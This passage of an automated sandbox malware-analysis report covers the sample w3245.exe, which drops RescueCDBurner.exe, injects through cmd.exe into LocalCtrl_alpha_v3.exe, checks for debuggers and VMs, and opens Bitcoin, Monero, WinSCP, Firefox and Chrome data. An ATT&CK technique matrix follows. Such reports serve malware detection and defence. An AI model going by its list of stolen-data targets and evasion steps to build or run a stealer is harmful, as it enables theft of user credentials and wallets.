t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,3_2_6B42E0BD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42DBC0 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,3_2_6B42DBC0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42F9DD _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42F9DD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42FF0E _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42FF0E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42F169 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42F169
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B43110C _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B43110C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42D687 _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,3_2_6B42D687
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42F593 _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42F593
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3AFDD _GetLogicalDriveStrings_@8,SetLastError,newMultiByteFromWideCharSize,GetLogicalDriveStringsA,ConvertMultiSZNameToW,GlobalFree,1_2_5BB3AFDD
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_009497A5 VirtualQuery,GetSystemInfo,0_2_009497A5
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: VMware
Source: RescueCDBurner.exe, 00000002.00000002.1749723448.000000006CA3F000.00000008.00000001.01000000.0000000B.sdmpBinary or memory string: l.?AVQEmulationPaintEngine@@0/:l
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000002.00000003.1729318882.000000000A469000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
Source: RescueCDBurner.exe, 00000003.00000002.1807012629.000000006B33F000.00000008.00000001.01000000.00000017.sdmpBinary or memory string: k.?AVQEmulationPaintEngine@@0/
Source: RescueCDBurner.exe, 0000000A.00000002.2073070792.000000006B99F000.00000008.00000001.01000000.00000017.sdmpBinary or memory string: k.?AVQEmulationPaintEngine@@0/0k
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
Source: RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
Source: RescueCDBurner.exe, 00000002.00000003.1729318882.000000000A469000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1749723448.000000006CA3F000.00000008.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000003.00000002.1807012629.000000006B33F000.00000008.00000001.01000000.00000017.sdmp, RescueCDBurner.exe, 0000000A.00000002.2073070792.000000006B99F000.00000008.00000001.01000000.00000017.sdmpBinary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Users\user\Desktop\w3245.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0092E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0092E88A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B456BA4 VirtualProtect ?,-00000001,00000104,?3_2_6B456BA4
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3CB21
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_009348D8 mov eax, dword ptr fs:[00000030h]0_2_009348D8
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CB48D8 mov eax, dword ptr fs:[00000030h]1_2_00CB48D8
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0090394F GetProcessHeap,RtlAllocateHeap,0_2_0090394F
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0092E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0092E3D8
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0092E9DC SetUnhandledExceptionFilter,0_2_0092E9DC
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00933C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00933C76
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CAE3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00CAE3D8
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CAE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00CAE88A
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CAE9DC SetUnhandledExceptionFilter,1_2_00CAE9DC
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CB3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00CB3C76
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeCode function: 2_2_6BD309A6 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,2_2_6BD309A6
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B0C7FC2 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6B0C7FC2
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B45AD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,3_2_6B45AD2C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B45C097 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6B45C097
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E07A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6B3E07A7
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4C3727 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6B4C3727

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read write
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read write
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 253010
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 237010
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe Code function: 1_2_5BB3EE0F _LogonUser_@24,SetLastError,newMultiByteFromWideChar,newMultiByteFromWideChar,newMultiByteFromWideChar,LogonUserA,GlobalFree,GlobalFree,GlobalFree,1_2_5BB3EE0F
Source: C:\Users\user\Desktop\w3245.exe Process created: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe "C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=688 -burn.filehandle.self=692
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Users\user\Desktop\w3245.exe Code function: 0_2_00941719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,0_2_00941719
Source: C:\Users\user\Desktop\w3245.exe Code function: 0_2_00943A5F AllocateAndInitializeSid,CheckTokenMembership,0_2_00943A5F
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: RescueCDBurner.exe, 00000003.00000002.1806872919.000000006B12E000.00000002.00000001.01000000.00000017.sdmp Binary or memory string: kChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: RescueCDBurner.exe, 00000002.00000002.1749574977.000000006C82E000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: n{lChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: C:\Users\user\Desktop\w3245.exe Code function: 0_2_0092EC07 cpuid 0_2_0092EC07
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe Code function: _GetLocaleInfo_@16,SetLastError,newMultiByteFromWideCharSize,GetLocaleInfoA,MultiByteToWideChar,GlobalFree,1_2_5BB32D1A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,3_2_6B45EF5C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6B45F356
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,3_2_6B3E73B4
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,3_2_6B3E7270
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,_stricmp,_TestDefaultLanguage,3_2_6B45F22F
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6B45F2EF
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,3_2_6B3E52E4
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,_strlen,GetLocaleInfoA,_stricmp,_strlen,_stricmp,_TestDefaultLanguage,3_2_6B45F05E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_6B45F003
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,3_2_6B3E767A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,3_2_6B3E750C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,3_2_6B3E74D0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: _Getdateorder,___lc_handle_func,GetLocaleInfoW,3_2_6B4BB33D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\w3245.exe Code function: 0_2_00914EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,0_2_00914EDF
Source: C:\Users\user\Desktop\w3245.exe Code function: 0_2_00906037 GetSystemTime,GetDateFormatW,GetLastError,GetLastError,GetDateFormatW,GetLastError,0_2_00906037
Source: C:\Users\user\Desktop\w3245.exe Code function: 0_2_009061DF GetUserNameW,GetLastError,0_2_009061DF
Source: C:\Users\user\Desktop\w3245.exe Code function: 0_2_0094887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,0_2_0094887B
Source: C:\Users\user\Desktop\w3245.exe Code function: 0_2_00905195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,0_2_00905195
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain
Execution: Native API (4); Command and Scripting Interpreter (3); Service Execution (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
Persistence: DLL Side-Loading (11); Create Account (1); Valid Accounts (2); Windows Service (4); Registry Run Keys / Startup Folder (1); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (11); Valid Accounts (2); Access Token Manipulation (21); Windows Service (4); Process Injection (213); Registry Run Keys / Startup Folder (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (1); DLL Side-Loading (11); File Deletion (1); Masquerading (21); Valid Accounts (2); Virtualization/Sandbox Evasion (11); Access Token Manipulation (21); Process Injection (213); Indicator Removal (1)
Credential Access: OS Credential Dumping (1); Credentials in Registry (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture
Discovery: System Time Discovery (12); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (14); System Information Discovery (148); Security Software Discovery (121); Process Discovery (3); Virtualization/Sandbox Evasion (11); System Owner/User Discovery (1); Network Service Discovery; System Network Connections Discovery; Process Discovery; Permission Groups Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
Collection: Archive Collected Data (11); Data from Local System (11); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (21); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service

Behavior Graph (ID: 1584991; Sample: w3245.exe; Startdate: 06/01/2025; Architecture: WINDOWS; Score: 76)

Source | Detection | Scanner | Label | Link
w3245.exe | 3% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll | 0% | ReversingLabs | |
